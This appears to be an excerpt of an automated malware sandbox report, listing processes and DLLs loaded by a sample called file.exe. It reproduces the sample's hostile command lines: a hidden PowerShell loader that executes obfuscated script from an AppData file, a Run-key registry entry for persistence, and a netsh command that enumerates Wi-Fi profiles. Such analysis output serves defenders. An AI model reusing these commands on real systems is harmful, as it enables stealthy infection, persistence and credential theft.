            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: sti.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: appresolver.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: bcp47langs.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: slc.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: sppc.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: napinsp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: pnrpnsp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wshbth.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: nlaapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: winrnr.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: sti.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ncrypt.dll
